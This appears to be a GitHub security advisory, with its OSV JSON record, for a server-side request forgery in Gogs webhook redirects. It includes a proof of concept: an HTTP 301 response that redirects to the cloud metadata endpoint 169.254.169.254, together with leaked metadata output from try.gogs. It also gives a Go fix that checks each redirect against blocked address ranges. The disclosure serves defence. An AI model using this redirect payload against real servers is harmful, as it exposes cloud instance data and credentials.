    GHSA-C4V7-XG93-QF8G

    Vulnerability from github – Published: 2026-06-22 22:44 – Updated: 2026-06-22 22:44
    Summary
    Gogs has SSRF in webhook deliveries
    Details

    Summary

    The fix for CVE-2022-1285 prevents adding webhooks, or running webhooks, whose URL has a hostname that resolves into localCIDRs. However, webhooks still follow HTTP redirects, which allows a webhook delivery to reach hostnames inside localCIDRs.

    This was already communicated in the initial report, but it looks like there was a bit of a miscommunication.

    Details

    By creating a webhook pointing to any URL that returns the following response:

    HTTP/1.1 301 Moved Permanently
    Location: http://169.254.169.254/metadata/v1.json
    Content-Length: 0
    Connection: close

    it is possible to reach 169.254.169.254 (the cloud provider metadata endpoint) from the Gogs server, because the redirect target is never checked against localCIDRs.

    PoC

    1. Run netcat on any server
    2. Use this server as the webhook URL
    3. Once you get the request from the webhook (for example by testing it), copy the response above

    Results from running this on try.gogs:

    {"droplet_id":456901166,"hostname":"gogs-do-nyc3-01","vendor_data":"Content-Type: multipart/mixed; boundary=\"===============8645434374073493512==\"\nMIME-Version: 1.0\n\n--===============8645434374073493512==\nMIME-Version: 1.0\nContent-Type: text/cloud-config; charset=\"us-ascii\"\nContent-Transfer-Encoding: 7bit\nContent-Disposition: attachment; filename=\"cloud-config\"\n\n#cloud-config\n\n# Enable root and password auth\ndisable_roo...{"dhcp_enabled":false,"vpc_peering_enabled":false},"dotty_status":"running","ssh_info":{"port":22}}

    Impact

    Server Side Request Forgery

    Fix

    The "simplest way" to fix it is most likely to leverage Client.CheckRedirect (https://pkg.go.dev/net/http#hdr-Clients_and_Transports) to check whether each redirect target points to a blocked hostname, using the same localCIDRs check that is already applied to the initial webhook URL.
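As an added example (not Gogs' own code and not the fix merged in pull request #8263), here is how a Go webhook client can apply the hostname check to every redirect hop through Client.CheckRedirect, which is the approach the paragraph above suggests. The blocked CIDR list, the function names (CheckURL, NewWebhookClient, RedirectToBlocked), the swappable lookupIP resolver and the local stand-in server that answers with a 301 are assumptions made for this example; the 169.254.169.254 target is the address from the advisory.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
	"net/netip"
	"net/url"
)

// Blocked ranges for this example (an assumption; Gogs keeps its own localCIDRs
// setting). 169.254.0.0/16 covers the metadata address cited in the advisory.
var localCIDRs = []netip.Prefix{
	netip.MustParsePrefix("127.0.0.0/8"), netip.MustParsePrefix("10.0.0.0/8"),
	netip.MustParsePrefix("172.16.0.0/12"), netip.MustParsePrefix("192.168.0.0/16"),
	netip.MustParsePrefix("169.254.0.0/16"), netip.MustParsePrefix("::1/128"),
	netip.MustParsePrefix("fc00::/7"), netip.MustParsePrefix("fe80::/10"),
}

// ErrBlockedHost is returned when a URL's host resolves into a blocked range.
var ErrBlockedHost = errors.New("webhook target resolves to a blocked address")

// lookupIP is the resolver CheckURL uses; a variable so a test can swap in a fixed table.
var lookupIP = func(host string) ([]netip.Addr, error) {
	return net.DefaultResolver.LookupNetIP(context.Background(), "ip", host)
}

// CheckURL rejects a URL if any address its hostname resolves to lies in
// localCIDRs. Literal IPs are checked directly without a DNS lookup.
func CheckURL(u *url.URL) error {
	host := u.Hostname()
	var addrs []netip.Addr
	if a, err := netip.ParseAddr(host); err == nil {
		addrs = []netip.Addr{a}
	} else {
		resolved, err := lookupIP(host)
		if err != nil {
			return fmt.Errorf("resolving webhook host %q: %w", host, err)
		}
		addrs = resolved
	}
	for _, a := range addrs {
		a = a.Unmap() // treat ::ffff:169.254.169.254 the same as 169.254.169.254
		for _, p := range localCIDRs {
			if p.Contains(a) {
				return fmt.Errorf("%w: %s -> %s", ErrBlockedHost, host, a)
			}
		}
	}
	return nil
}

// NewWebhookClient returns an http.Client whose CheckRedirect runs CheckURL on
// every redirect hop; an error from CheckRedirect makes Client.Do fail instead
// of following the Location header. CheckURL should also run on the initial
// webhook URL (the part the CVE-2022-1285 fix already covered).
func NewWebhookClient() *http.Client {
	return &http.Client{
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			if len(via) >= 5 { // a custom CheckRedirect replaces Go's default 10-hop limit
				return errors.New("too many redirects")
			}
			return CheckURL(req.URL)
		},
	}
}

// RedirectToBlocked models the advisory's scenario with a local stand-in server
// that answers 301 with a Location on 169.254.169.254, and returns the error
// the hardened client produces instead of following it.
func RedirectToBlocked() error {
	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, "http://169.254.169.254/metadata/v1.json", http.StatusMovedPermanently)
	}))
	defer srv.Close()
	resp, err := NewWebhookClient().Get(srv.URL)
	if err == nil {
		resp.Body.Close()
	}
	return err
}

func main() {
	fmt.Println("redirect to metadata service:", RedirectToBlocked())
	u, _ := url.Parse("http://169.254.169.254/metadata/v1.json")
	fmt.Println("direct metadata URL:", CheckURL(u))
}
```

Note that CheckURL resolves the hostname once for the check while the transport resolves it again when dialing, so a name whose DNS answer changes between the two lookups can slip past a check of this shape; a stricter variant validates the address actually being dialed (for example with net.Dialer.Control, or by dialing only the vetted IP), which closes that gap for both the initial request and every redirect hop.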


    {
      "affected": [
        {
          "database_specific": {
            "last_known_affected_version_range": "\u003c= 0.14.2"
          },
          "package": {
            "ecosystem": "Go",
            "name": "gogs.io/gogs"
          },
          "ranges": [
            {
              "events": [
                {
                  "introduced": "0"
                },
                {
                  "fixed": "0.14.3"
                }
              ],
              "type": "ECOSYSTEM"
            }
          ]
        }
      ],
      "aliases": [
        "CVE-2026-47267"
      ],
      "database_specific": {
        "cwe_ids": [
          "CWE-918"
        ],
        "github_reviewed": true,
        "github_reviewed_at": "2026-06-22T22:44:57Z",
        "nvd_published_at": null,
        "severity": "MODERATE"
      },
      "details": "### Summary\nThe fix for  CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs.\n\nThis was already communicated in the initial report but it looks like there was a bit of a miscommunication.\n\n### Details\n\nBy creating a webook pointing to any URL that will return the following:\n\n```\nHTTP/1.1 301 Moved Permanently\nLocation: http://169.254.169.254/metadata/v1.json\nContent-Length: 0\nConnection: close\n```\nIt is possible to access 169.254.169.254\n\n### PoC\n\n1. Run netcat on any server\n2. Use this server as the webhook URL\n3. Once you get the request from the webhook (for example by testing it), copy the response above\n\nResults from running this on try.gogs:\n\n```\n{\"droplet_id\":456901166,\"hostname\":\"gogs-do-nyc3-01\",\"vendor_data\":\"Content-Type: multipart/mixed; boundary=\\\"===============8645434374073493512==\\\"\\nMIME-Version: 1.0\\n\\n--===============8645434374073493512==\\nMIME-Version: 1.0\\nContent-Type: text/cloud-config; charset=\\\"us-ascii\\\"\\nContent-Transfer-Encoding: 7bit\\nContent-Disposition: attachment; filename=\\\"cloud-config\\\"\\n\\n#cloud-config\\n\\n# Enable root and password auth\\ndisable_roo...{\"dhcp_enabled\":false,\"vpc_peering_enabled\":false},\"dotty_status\":\"running\",\"ssh_info\":{\"port\":22}}\n```\n\n### Impact\nServer Side Request Forgery\n\n### Fix\n\nThe \"simplest way\" to fix it is most likely to leverage Client.CheckRedirect https://pkg.go.dev/net/http#hdr-Clients_and_Transports to check if the redirect is pointing to a blocked hostname",
      "id": "GHSA-c4v7-xg93-qf8g",
      "modified": "2026-06-22T22:44:57Z",
      "published": "2026-06-22T22:44:57Z",
      "references": [
        {
          "type": "WEB",
          "url": "https://github.com/gogs/gogs/security/advisories/GHSA-c4v7-xg93-qf8g"
        },
        {
          "type": "WEB",
          "url": "https://github.com/gogs/gogs/pull/8263"
        },
        {
          "type": "WEB",
          "url": "https://github.com/gogs/gogs/commit/199cf4fd5bbe40b92f6dc8d649e241fd7a8d0018"
        },
        {
          "type": "PACKAGE",
          "url": "https://github.com/gogs/gogs"
        }
      ],
      "schema_version": "1.4.0",
      "severity": [],
      "summary": "Gogs has SSRF in webhook deliveries"
    }